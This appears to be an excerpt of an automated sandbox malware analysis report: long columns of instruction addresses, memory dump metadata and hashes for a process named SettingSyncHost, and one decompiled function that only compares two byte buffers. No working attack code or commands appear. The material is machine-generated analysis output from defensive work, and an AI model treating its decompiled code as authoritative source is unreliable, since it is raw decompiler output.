                                                                                                                                      0x0039d692
                                                                                                                                      0x0039d698
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d698
                                                                                                                                      0x0039d673
                                                                                                                                      0x0039d673
                                                                                                                                      0x0039d679
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d679
                                                                                                                                      0x0039d654
                                                                                                                                      0x0039d654
                                                                                                                                      0x0039d65a
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d65a
                                                                                                                                      0x0039d5c2
                                                                                                                                      0x0039d5c4
                                                                                                                                      0x0039d5d9
                                                                                                                                      0x0039d5e1
                                                                                                                                      0x0039d5e3
                                                                                                                                      0x0039d5f8
                                                                                                                                      0x0039d600
                                                                                                                                      0x0039d602
                                                                                                                                      0x0039d617
                                                                                                                                      0x0039d61f
                                                                                                                                      0x0039d621
                                                                                                                                      0x0039d62a
                                                                                                                                      0x0039d62a
                                                                                                                                      0x0039d62a
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d621
                                                                                                                                      0x0039d60b
                                                                                                                                      0x0039d60b
                                                                                                                                      0x0039d611
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d611
                                                                                                                                      0x0039d5ec
                                                                                                                                      0x0039d5ec
                                                                                                                                      0x0039d5f2
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d5f2
                                                                                                                                      0x0039d5cd
                                                                                                                                      0x0039d5cd
                                                                                                                                      0x0039d5d3
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d5d3
                                                                                                                                      0x0039d53b
                                                                                                                                      0x0039d53d
                                                                                                                                      0x0039d552
                                                                                                                                      0x0039d55a
                                                                                                                                      0x0039d55c
                                                                                                                                      0x0039d571
                                                                                                                                      0x0039d579
                                                                                                                                      0x0039d57b
                                                                                                                                      0x0039d590
                                                                                                                                      0x0039d598
                                                                                                                                      0x0039d59a
                                                                                                                                      0x0039d5a3
                                                                                                                                      0x0039d5a3
                                                                                                                                      0x0039d5a3
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d59a
                                                                                                                                      0x0039d584
                                                                                                                                      0x0039d584
                                                                                                                                      0x0039d58a
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d58a
                                                                                                                                      0x0039d565
                                                                                                                                      0x0039d565
                                                                                                                                      0x0039d56b
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d56b
                                                                                                                                      0x0039d546
                                                                                                                                      0x0039d546
                                                                                                                                      0x0039d54c
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d4ad
                                                                                                                                      0x0039d4ad
                                                                                                                                      0x0039d4b0
                                                                                                                                      0x0039d4b4
                                                                                                                                      0x0039d4b6
                                                                                                                                      0x0039d4cb
                                                                                                                                      0x0039d4cb
                                                                                                                                      0x0039d4cf
                                                                                                                                      0x0039d4d3
                                                                                                                                      0x0039d4d5
                                                                                                                                      0x0039d4ea
                                                                                                                                      0x0039d4ea
                                                                                                                                      0x0039d4ee
                                                                                                                                      0x0039d4f2
                                                                                                                                      0x0039d4f4
                                                                                                                                      0x0039d509
                                                                                                                                      0x0039d509
                                                                                                                                      0x0039d50d
                                                                                                                                      0x0039d511
                                                                                                                                      0x0039d513
                                                                                                                                      0x0039d515
                                                                                                                                      0x0039d51c
                                                                                                                                      0x0039d51c
                                                                                                                                      0x0039d51c
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d513
                                                                                                                                      0x0039d4f6
                                                                                                                                      0x0039d4fa
                                                                                                                                      0x0039d4fd
                                                                                                                                      0x0039d4fd
                                                                                                                                      0x0039d503
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d503
                                                                                                                                      0x0039d4d7
                                                                                                                                      0x0039d4db
                                                                                                                                      0x0039d4de
                                                                                                                                      0x0039d4de
                                                                                                                                      0x0039d4e4
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d4e4
                                                                                                                                      0x0039d4b8
                                                                                                                                      0x0039d4bc
                                                                                                                                      0x0039d4bf
                                                                                                                                      0x0039d4bf
                                                                                                                                      0x0039d4c5
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d4c5
                                                                                                                                      0x0039cd2e
                                                                                                                                      0x0039cd2e
                                                                                                                                      0x00000000

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                      • Instruction ID: e14b960c3f1e1843109ecdde8bc801b2f97e43d88186aba76b81b915e8bfcc40
                                                                                                                                      • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                      • Instruction Fuzzy Hash: 25C18C73D1E5B2098F37462D145923FEEA26E92B8132FC3A5DCD03F68DC622AD0596D0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 0039D0D3, Relevance: .3, Instructions: 332COMMONCrypto
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0039D0D3(void* __eax, void* __ecx) {
				void* _t183;
				signed int _t184;
				void* _t187;
				signed char _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t197;
				signed int _t271;
				void* _t274;
				void* _t276;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t309;
				void* _t311;
				void* _t313;

				_t187 = __ecx;
				_t183 = __eax;
				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
					_t271 = 0;
					L12:
					if(_t271 != 0) {
						goto L1;
					}
					_t192 =  *(_t183 - 0x19);
					if(_t192 ==  *(_t187 - 0x19)) {
						_t271 = 0;
						L23:
						if(_t271 != 0) {
							goto L1;
						}
						_t193 =  *(_t183 - 0x15);
						if(_t193 ==  *(_t187 - 0x15)) {
							_t271 = 0;
							L34:
							if(_t271 != 0) {
								goto L1;
							}
							_t194 =  *(_t183 - 0x11);
							if(_t194 ==  *(_t187 - 0x11)) {
								_t271 = 0;
								L45:
								if(_t271 != 0) {
									goto L1;
								}
								_t195 =  *(_t183 - 0xd);
								if(_t195 ==  *(_t187 - 0xd)) {
									_t271 = 0;
									L56:
									if(_t271 != 0) {
										goto L1;
									}
									if( *(_t183 - 9) ==  *(_t187 - 9)) {
										_t271 = 0;
										L67:
										if(_t271 != 0) {
											goto L1;
										}
										_t197 =  *(_t183 - 5);
										if(_t197 ==  *(_t187 - 5)) {
											_t271 = 0;
											L78:
											if(_t271 != 0) {
												goto L1;
											}
											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
											if(_t184 != 0) {
												_t182 = (0 | _t184 > 0x00000000) - 1; // -1
												_t184 = (_t184 > 0) + _t182;
											}
											L2:
											return _t184;
										}
										_t274 = (_t197 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
										if(_t274 == 0) {
											L71:
											_t276 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
											if(_t276 == 0) {
												L73:
												_t278 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
												if(_t278 == 0) {
													L75:
													_t271 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
													if(_t271 != 0) {
														_t176 = (0 | _t271 > 0x00000000) - 1; // -1
														_t271 = (_t271 > 0) + _t176;
													}
													goto L78;
												}
												_t170 = (0 | _t278 > 0x00000000) - 1; // -1
												_t271 = (_t278 > 0) + _t170;
												if(_t271 != 0) {
													goto L1;
												}
												goto L75;
											}
											_t164 = (0 | _t276 > 0x00000000) - 1; // -1
											_t271 = (_t276 > 0) + _t164;
											if(_t271 != 0) {
												goto L1;
											}
											goto L73;
										}
										_t158 = (0 | _t274 > 0x00000000) - 1; // -1
										_t271 = (_t274 > 0) + _t158;
										if(_t271 != 0) {
											goto L1;
										}
										goto L71;
									}
									_t281 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
									if(_t281 == 0) {
										L60:
										_t283 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
										if(_t283 == 0) {
											L62:
											_t285 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
											if(_t285 == 0) {
												L64:
												_t271 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
												if(_t271 != 0) {
													_t151 = (0 | _t271 > 0x00000000) - 1; // -1
													_t271 = (_t271 > 0) + _t151;
												}
												goto L67;
											}
											_t145 = (0 | _t285 > 0x00000000) - 1; // -1
											_t271 = (_t285 > 0) + _t145;
											if(_t271 != 0) {
												goto L1;
											}
											goto L64;
										}
										_t139 = (0 | _t283 > 0x00000000) - 1; // -1
										_t271 = (_t283 > 0) + _t139;
										if(_t271 != 0) {
											goto L1;
										}
										goto L62;
									}
									_t133 = (0 | _t281 > 0x00000000) - 1; // -1
									_t271 = (_t281 > 0) + _t133;
									if(_t271 != 0) {
										goto L1;
									}
									goto L60;
								}
								_t288 = (_t195 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
								if(_t288 == 0) {
									L49:
									_t290 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
									if(_t290 == 0) {
										L51:
										_t292 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
										if(_t292 == 0) {
											L53:
											_t271 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
											if(_t271 != 0) {
												_t125 = (0 | _t271 > 0x00000000) - 1; // -1
												_t271 = (_t271 > 0) + _t125;
											}
											goto L56;
										}
										_t119 = (0 | _t292 > 0x00000000) - 1; // -1
										_t271 = (_t292 > 0) + _t119;
										if(_t271 != 0) {
											goto L1;
										}
										goto L53;
									}
									_t113 = (0 | _t290 > 0x00000000) - 1; // -1
									_t271 = (_t290 > 0) + _t113;
									if(_t271 != 0) {
										goto L1;
									}
									goto L51;
								}
								_t107 = (0 | _t288 > 0x00000000) - 1; // -1
								_t271 = (_t288 > 0) + _t107;
								if(_t271 != 0) {
									goto L1;
								}
								goto L49;
							}
							_t295 = (_t194 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
							if(_t295 == 0) {
								L38:
								_t297 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
								if(_t297 == 0) {
									L40:
									_t299 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
									if(_t299 == 0) {
										L42:
										_t271 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
										if(_t271 != 0) {
											_t100 = (0 | _t271 > 0x00000000) - 1; // -1
											_t271 = (_t271 > 0) + _t100;
										}
										goto L45;
									}
									_t94 = (0 | _t299 > 0x00000000) - 1; // -1
									_t271 = (_t299 > 0) + _t94;
									if(_t271 != 0) {
										goto L1;
									}
									goto L42;
								}
								_t88 = (0 | _t297 > 0x00000000) - 1; // -1
								_t271 = (_t297 > 0) + _t88;
								if(_t271 != 0) {
									goto L1;
								}
								goto L40;
							}
							_t82 = (0 | _t295 > 0x00000000) - 1; // -1
							_t271 = (_t295 > 0) + _t82;
							if(_t271 != 0) {
								goto L1;
							}
							goto L38;
						}
						_t302 = (_t193 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L27:
							_t304 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L29:
								_t306 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L31:
									_t271 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
									if(_t271 != 0) {
										_t75 = (0 | _t271 > 0x00000000) - 1; // -1
										_t271 = (_t271 > 0) + _t75;
									}
									goto L34;
								}
								_t69 = (0 | _t306 > 0x00000000) - 1; // -1
								_t271 = (_t306 > 0) + _t69;
								if(_t271 != 0) {
									goto L1;
								}
								goto L31;
							}
							_t63 = (0 | _t304 > 0x00000000) - 1; // -1
							_t271 = (_t304 > 0) + _t63;
							if(_t271 != 0) {
								goto L1;
							}
							goto L29;
						}
						_t57 = (0 | _t302 > 0x00000000) - 1; // -1
						_t271 = (_t302 > 0) + _t57;
						if(_t271 != 0) {
							goto L1;
						}
						goto L27;
					}
					_t309 = (_t192 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
					if(_t309 == 0) {
						L16:
						_t311 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
						if(_t311 == 0) {
							L18:
							_t313 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
							if(_t313 == 0) {
								L20:
								_t271 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
								if(_t271 != 0) {
									_t50 = (0 | _t271 > 0x00000000) - 1; // -1
									_t271 = (_t271 > 0) + _t50;
								}
								goto L23;
							}
							_t44 = (0 | _t313 > 0x00000000) - 1; // -1
							_t271 = (_t313 > 0) + _t44;
							if(_t271 != 0) {
								goto L1;
							}
							goto L20;
						}
						_t38 = (0 | _t311 > 0x00000000) - 1; // -1
						_t271 = (_t311 > 0) + _t38;
						if(_t271 != 0) {
							goto L1;
						}
						goto L18;
					}
					_t32 = (0 | _t309 > 0x00000000) - 1; // -1
					_t271 = (_t309 > 0) + _t32;
					if(_t271 != 0) {
						goto L1;
					}
					goto L16;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1d) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
					if(__esi == 0) {
						L5:
						__esi =  *(__eax - 0x1c) & 0x000000ff;
						__edx =  *(__ecx - 0x1c) & 0x000000ff;
						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
						if(__esi == 0) {
							L7:
							__esi =  *(__eax - 0x1b) & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L9:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t25 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t25;
								}
								goto L12;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t19 = __edx - 1; // -1
							__esi = __edx + _t19;
							if(__edx + _t19 != 0) {
								goto L1;
							}
							goto L9;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t13 = __edx - 1; // -1
						__esi = __edx + _t13;
						if(__edx + _t13 != 0) {
							goto L1;
						}
						goto L7;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t7 = __edx - 1; // -1
					__esi = __edx + _t7;
					if(__edx + _t7 != 0) {
						goto L1;
					}
					goto L5;
				}
				L1:
				_t184 = _t271;
				goto L2;
			}






























                                                                                                                                      0x0039d0d3
                                                                                                                                      0x0039d0d3
                                                                                                                                      0x0039d0d9
                                                                                                                                      0x0039d150
                                                                                                                                      0x0039d152
                                                                                                                                      0x0039d154
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d15a
                                                                                                                                      0x0039d160
                                                                                                                                      0x0039d1d7
                                                                                                                                      0x0039d1d9
                                                                                                                                      0x0039d1db
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d1e1
                                                                                                                                      0x0039d1e7
                                                                                                                                      0x0039d25e
                                                                                                                                      0x0039d260
                                                                                                                                      0x0039d262
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d268
                                                                                                                                      0x0039d26e
                                                                                                                                      0x0039d2e5
                                                                                                                                      0x0039d2e7
                                                                                                                                      0x0039d2e9
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d2ef
                                                                                                                                      0x0039d2f5
                                                                                                                                      0x0039d36c
                                                                                                                                      0x0039d36e
                                                                                                                                      0x0039d370
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d37c
                                                                                                                                      0x0039d3f4
                                                                                                                                      0x0039d3f6
                                                                                                                                      0x0039d3f8
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d3fe
                                                                                                                                      0x0039d404
                                                                                                                                      0x0039d47b
                                                                                                                                      0x0039d47d
                                                                                                                                      0x0039d47f
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d48d
                                                                                                                                      0x0039d48f
                                                                                                                                      0x0039d49c
                                                                                                                                      0x0039d49c
                                                                                                                                      0x0039d49c
                                                                                                                                      0x0039d0cd
                                                                                                                                      0x0039dd71
                                                                                                                                      0x0039dd71
                                                                                                                                      0x0039d40d
                                                                                                                                      0x0039d40f
                                                                                                                                      0x0039d424
                                                                                                                                      0x0039d42c
                                                                                                                                      0x0039d42e
                                                                                                                                      0x0039d443
                                                                                                                                      0x0039d44b
                                                                                                                                      0x0039d44d
                                                                                                                                      0x0039d462
                                                                                                                                      0x0039d46a
                                                                                                                                      0x0039d46c
                                                                                                                                      0x0039d475
                                                                                                                                      0x0039d475
                                                                                                                                      0x0039d475
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d46c
                                                                                                                                      0x0039d456
                                                                                                                                      0x0039d456
                                                                                                                                      0x0039d45c
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d45c
                                                                                                                                      0x0039d437
                                                                                                                                      0x0039d437
                                                                                                                                      0x0039d43d
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d43d
                                                                                                                                      0x0039d418
                                                                                                                                      0x0039d418
                                                                                                                                      0x0039d41e
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d41e
                                                                                                                                      0x0039d386
                                                                                                                                      0x0039d388
                                                                                                                                      0x0039d39d
                                                                                                                                      0x0039d3a5
                                                                                                                                      0x0039d3a7
                                                                                                                                      0x0039d3bc
                                                                                                                                      0x0039d3c4
                                                                                                                                      0x0039d3c6
                                                                                                                                      0x0039d3db
                                                                                                                                      0x0039d3e3
                                                                                                                                      0x0039d3e5
                                                                                                                                      0x0039d3ee
                                                                                                                                      0x0039d3ee
                                                                                                                                      0x0039d3ee
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d3e5
                                                                                                                                      0x0039d3cf
                                                                                                                                      0x0039d3cf
                                                                                                                                      0x0039d3d5
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d3d5
                                                                                                                                      0x0039d3b0
                                                                                                                                      0x0039d3b0
                                                                                                                                      0x0039d3b6
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d3b6
                                                                                                                                      0x0039d391
                                                                                                                                      0x0039d391
                                                                                                                                      0x0039d397
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d397
                                                                                                                                      0x0039d2fe
                                                                                                                                      0x0039d300
                                                                                                                                      0x0039d315
                                                                                                                                      0x0039d31d
                                                                                                                                      0x0039d31f
                                                                                                                                      0x0039d334
                                                                                                                                      0x0039d33c
                                                                                                                                      0x0039d33e
                                                                                                                                      0x0039d353
                                                                                                                                      0x0039d35b
                                                                                                                                      0x0039d35d
                                                                                                                                      0x0039d366
                                                                                                                                      0x0039d366
                                                                                                                                      0x0039d366
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d35d
                                                                                                                                      0x0039d347
                                                                                                                                      0x0039d347
                                                                                                                                      0x0039d34d
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d34d
                                                                                                                                      0x0039d328
                                                                                                                                      0x0039d328
                                                                                                                                      0x0039d32e
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d32e
                                                                                                                                      0x0039d309
                                                                                                                                      0x0039d309
                                                                                                                                      0x0039d30f
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d30f
                                                                                                                                      0x0039d277
                                                                                                                                      0x0039d279
                                                                                                                                      0x0039d28e
                                                                                                                                      0x0039d296
                                                                                                                                      0x0039d298
                                                                                                                                      0x0039d2ad
                                                                                                                                      0x0039d2b5
                                                                                                                                      0x0039d2b7
                                                                                                                                      0x0039d2cc
                                                                                                                                      0x0039d2d4
                                                                                                                                      0x0039d2d6
                                                                                                                                      0x0039d2df
                                                                                                                                      0x0039d2df
                                                                                                                                      0x0039d2df
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d2d6
                                                                                                                                      0x0039d2c0
                                                                                                                                      0x0039d2c0
                                                                                                                                      0x0039d2c6
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d2c6
                                                                                                                                      0x0039d2a1
                                                                                                                                      0x0039d2a1
                                                                                                                                      0x0039d2a7
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d2a7
                                                                                                                                      0x0039d282
                                                                                                                                      0x0039d282
                                                                                                                                      0x0039d288
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d288
                                                                                                                                      0x0039d1f0
                                                                                                                                      0x0039d1f2
                                                                                                                                      0x0039d207
                                                                                                                                      0x0039d20f
                                                                                                                                      0x0039d211
                                                                                                                                      0x0039d226
                                                                                                                                      0x0039d22e
                                                                                                                                      0x0039d230
                                                                                                                                      0x0039d245
                                                                                                                                      0x0039d24d
                                                                                                                                      0x0039d24f
                                                                                                                                      0x0039d258
                                                                                                                                      0x0039d258
                                                                                                                                      0x0039d258
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d24f
                                                                                                                                      0x0039d239
                                                                                                                                      0x0039d239
                                                                                                                                      0x0039d23f
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d23f
                                                                                                                                      0x0039d21a
                                                                                                                                      0x0039d21a
                                                                                                                                      0x0039d220
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d220
                                                                                                                                      0x0039d1fb
                                                                                                                                      0x0039d1fb
                                                                                                                                      0x0039d201
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d201
                                                                                                                                      0x0039d169
                                                                                                                                      0x0039d16b
                                                                                                                                      0x0039d180
                                                                                                                                      0x0039d188
                                                                                                                                      0x0039d18a
                                                                                                                                      0x0039d19f
                                                                                                                                      0x0039d1a7
                                                                                                                                      0x0039d1a9
                                                                                                                                      0x0039d1be
                                                                                                                                      0x0039d1c6
                                                                                                                                      0x0039d1c8
                                                                                                                                      0x0039d1d1
                                                                                                                                      0x0039d1d1
                                                                                                                                      0x0039d1d1
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d1c8
                                                                                                                                      0x0039d1b2
                                                                                                                                      0x0039d1b2
                                                                                                                                      0x0039d1b8
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d1b8
                                                                                                                                      0x0039d193
                                                                                                                                      0x0039d193
                                                                                                                                      0x0039d199
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d199
                                                                                                                                      0x0039d174
                                                                                                                                      0x0039d174
                                                                                                                                      0x0039d17a
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d0db
                                                                                                                                      0x0039d0db
                                                                                                                                      0x0039d0de
                                                                                                                                      0x0039d0e2
                                                                                                                                      0x0039d0e4
                                                                                                                                      0x0039d0f9
                                                                                                                                      0x0039d0f9
                                                                                                                                      0x0039d0fd
                                                                                                                                      0x0039d101
                                                                                                                                      0x0039d103
                                                                                                                                      0x0039d118
                                                                                                                                      0x0039d118
                                                                                                                                      0x0039d11c
                                                                                                                                      0x0039d120
                                                                                                                                      0x0039d122
                                                                                                                                      0x0039d137
                                                                                                                                      0x0039d137
                                                                                                                                      0x0039d13b
                                                                                                                                      0x0039d13f
                                                                                                                                      0x0039d141
                                                                                                                                      0x0039d143
                                                                                                                                      0x0039d14a
                                                                                                                                      0x0039d14a
                                                                                                                                      0x0039d14a
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d141
                                                                                                                                      0x0039d124
                                                                                                                                      0x0039d128
                                                                                                                                      0x0039d12b
                                                                                                                                      0x0039d12b
                                                                                                                                      0x0039d131
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d131
                                                                                                                                      0x0039d105
                                                                                                                                      0x0039d109
                                                                                                                                      0x0039d10c
                                                                                                                                      0x0039d10c
                                                                                                                                      0x0039d112
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d112
                                                                                                                                      0x0039d0e6
                                                                                                                                      0x0039d0ea
                                                                                                                                      0x0039d0ed
                                                                                                                                      0x0039d0ed
                                                                                                                                      0x0039d0f3
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0039d0f3
                                                                                                                                      0x0039cd2e
                                                                                                                                      0x0039cd2e
                                                                                                                                      0x00000000

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
